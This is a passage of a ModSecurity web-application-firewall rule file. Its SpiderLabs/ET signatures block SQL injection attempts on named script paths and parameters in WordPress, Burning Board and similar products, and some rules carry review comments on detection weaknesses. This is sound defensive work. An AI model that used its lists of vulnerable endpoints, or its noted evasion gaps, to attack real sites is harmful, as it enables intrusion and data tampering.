0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WSPortal SQL Injection Attempt -- content.php page UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005960) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- phonemessage.asp num UPDATE SecRule REQUEST_LINE "@contains /phonemessage.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005960,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- phonemessage.asp num UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3032'" SecRule &TX:'/SQL_INJECTION.*ARGS:num/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- phonemessage.asp num UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005966) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- faqDsp.asp catcode UPDATE SecRule REQUEST_LINE "@contains /faqDsp.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005966,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- faqDsp.asp catcode UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3032'" SecRule &TX:'/SQL_INJECTION.*ARGS:catcode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- faqDsp.asp catcode 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006980) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php login UPDATE SecRule REQUEST_LINE "@contains /process.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006980,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php login UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4687'" SecRule &TX:'/SQL_INJECTION.*ARGS:login/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php login UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006986) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php password UPDATE SecRule REQUEST_LINE "@contains /process.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006986,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php password UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4687'" SecRule &TX:'/SQL_INJECTION.*ARGS:password/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php password UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- dlwallpaper.php 
wallpaperid UPDATE SecRule REQUEST_LINE "@contains /dlwallpaper.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006992,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- dlwallpaper.php wallpaperid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4687'" SecRule &TX:'/SQL_INJECTION.*ARGS:wallpaperid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- dlwallpaper.php wallpaperid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006998) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- wallpaper.php wallpaperid UPDATE SecRule REQUEST_LINE "@contains /wallpaper.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006998,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- wallpaper.php wallpaperid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2835'" SecRule &TX:'/SQL_INJECTION.*ARGS:wallpaperid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- wallpaper.php wallpaperid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007075) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WarHound General Shopping Cart SQL Injection Attempt -- item.asp ItemID UPDATE SecRule REQUEST_LINE "@contains /item.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007075,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS WarHound General 
Shopping Cart SQL Injection Attempt -- item.asp ItemID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21324'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:ItemID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WarHound General Shopping Cart SQL Injection Attempt -- item.asp ItemID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004759) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- index.php strid UPDATE
# Two-link chain:
#   link 1: REQUEST_LINE, after t:urlDecodeUni, t:htmlEntityDecode and
#           t:normalisePathWin, must contain the literal "/index.php".
#   link 2: "&TX:'/regex/'" counts the TX variables whose name matches the
#           regex; "@gt 0" requires at least one.
#   on match: audit-log part E is added, tx.msg is set, tx.anomaly_score is
#           raised by tx.critical_anomaly_score, and the matched variable is
#           stored as tx.<rule id>-WEB_ATTACK/SQL_INJECTION-<variable name>.
# NOTE(review): presumably the TX variables that link 2 looks for are written
# by generic SQL-injection rules that ran earlier in the same transaction;
# if those are disabled or loaded after this file, link 2 never matches.
# NOTE(review): "/index.php" is not specific to one product and the name
# regex has no end anchor ("ARGS:strid" also matches longer names), so treat
# the product name in msg as a hint when triaging, not as attribution.
# NOTE(review): @contains compares case-sensitively and no t:lowercase is
# applied, so the path literal only matches in the exact case written here.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004759,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- index.php strid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22726'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:strid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- index.php strid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004765) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- filecheck.php id UPDATE
# Three-link chain: (1) request line contains "/filecheck.php", (2) request
# line contains the literal "id[", (3) QUERY_STRING or REQUEST_BODY matches
# (?i:UPDATE.+SET), i.e. "UPDATE", at least one character, then "SET",
# case-insensitively.
# NOTE(review): links 2 and 3 list no t: actions of their own; whether the
# decoding applied in link 1 (or a SecDefaultAction default) also applies to
# them is not visible here. Confirm that both links see decoded input.
# NOTE(review): the regex has no word boundaries, so ordinary text such as
# "updates ... settings" satisfies link 3.
# NOTE(review): REQUEST_BODY is presumably only populated when request-body
# inspection is enabled for the request - confirm.
SecRule REQUEST_LINE "@contains /filecheck.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004765,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- filecheck.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22726'"
    SecRule REQUEST_LINE "@contains id[" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- filecheck.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004916) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebTester SQL Injection Attempt -- directions.php testID UPDATE
# Two-link pattern: "/directions.php" plus a TX name matching
# /SQL_INJECTION.*ARGS:testID/ (unanchored at the end).
SecRule REQUEST_LINE "@contains /directions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004916,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WebTester SQL Injection Attempt -- directions.php testID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22559'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:testID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebTester SQL Injection Attempt -- directions.php testID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004778) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ban SQL Injection Attempt -- connexion.php id UPDATE
# Two-link pattern: "/connexion.php" plus a TX name matching
# /SQL_INJECTION.*ARGS:id/. Tagged with CVE-2006-7089.
# NOTE(review): "ARGS:id" is unanchored, so every argument whose name begins
# with "id" satisfies link 2; "ARGS:id$" would restrict it to "id".
SecRule REQUEST_LINE "@contains /connexion.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004778,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Ban SQL Injection Attempt -- connexion.php id UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-7089'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ban SQL Injection Attempt -- connexion.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004229) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- functions_filters.asp UPDATE
# Variant without a TX lookup: link 1 requires
# "/functions/functions_filters.asp" in the request line, link 2 applies
# (?i:UPDATE.+SET) directly to QUERY_STRING and REQUEST_BODY.
# NOTE(review): same caveats as the other direct-regex rule in this section:
# no word boundaries in the regex, and link 2 declares no transformations of
# its own - confirm it sees decoded input.
# NOTE(review): the target is an .asp path but the match is case-sensitive;
# if the protected server resolves paths case-insensitively, add t:lowercase
# and lower-case the literal - confirm against the deployment.
SecRule REQUEST_LINE "@contains /functions/functions_filters.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004229,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- functions_filters.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23051'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- functions_filters.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004234) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- pop_up_member_search.asp name UPDATE
# Two-link pattern: "/forum/pop_up_member_search.asp" plus a TX name matching
# /SQL_INJECTION.*ARGS:name/ (unanchored; also matches longer names that
# start with "name"). The literal includes the "/forum/" directory, so an
# installation under a different directory is not covered by link 1.
SecRule REQUEST_LINE "@contains /forum/pop_up_member_search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004234,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- pop_up_member_search.asp name UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23051'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- pop_up_member_search.asp name UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004240) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- page.asp NewsID UPDATE
SecRule REQUEST_LINE "@contains /News/page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004240,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- page.asp NewsID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23051'"
SecRule
&TX:'/SQL_INJECTION.*ARGS:NewsID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- page.asp NewsID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005232) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Website Baker SQL Injection Attempt -- eWebQuiz.asp QuizID UPDATE SecRule REQUEST_LINE "@contains /eWebQuiz.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005232,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Website Baker SQL Injection Attempt -- eWebQuiz.asp QuizID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-0527'" SecRule &TX:'/SQL_INJECTION.*ARGS:QuizID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Website Baker SQL Injection Attempt -- eWebQuiz.asp QuizID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004145) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Weekly Drawing Contest SQL Injection Attempt -- check_vote.php order UPDATE SecRule REQUEST_LINE "@contains /check_vote.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004145,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Weekly Drawing Contest SQL Injection Attempt -- check_vote.php order UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/462702/100/100/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Weekly Drawing Contest SQL Injection Attempt -- check_vote.php order UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004252) SpiderLabs Research 
(SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board SQL Injection Attempt -- usergroups.php UPDATE SecRule REQUEST_LINE "@contains /usergroups.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004252,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board SQL Injection Attempt -- usergroups.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22970'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board SQL Injection Attempt -- usergroups.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005002) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) Lite SQL Injection Attempt -- pms.php pmid UPDATE SecRule REQUEST_LINE "@contains /pms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005002,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) Lite SQL Injection Attempt -- pms.php pmid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3262'" SecRule REQUEST_LINE "@contains pmid[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) Lite SQL Injection Attempt -- pms.php pmid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005285) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE SecRule REQUEST_LINE "@contains /search.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005285,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3144'" SecRule REQUEST_LINE "@contains boardids[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005291) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005291,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3144'" SecRule REQUEST_LINE "@contains board[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006926) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board Lite SQL Injection Attempt -- thread.php threadvisit UPDATE SecRule REQUEST_LINE "@contains /thread.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006926,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board Lite SQL Injection 
Attempt -- thread.php threadvisit UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2841'" SecRule &TX:'/SQL_INJECTION.*ARGS:threadvisit/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board Lite SQL Injection Attempt -- thread.php threadvisit UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004016) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004016,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule &TX:'/SQL_INJECTION.*ARGS:cookie/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004408) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004408,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004659,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005662) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005662,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005870) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE SecRule REQUEST_LINE "@contains /wp-trackback.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005870,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011047) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011047,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:postid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004348) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X-Ice News System SQL Injection Attempt -- devami.asp id UPDATE SecRule REQUEST_LINE "@contains /devami.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004348,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS X-Ice News System SQL Injection Attempt -- devami.asp id 
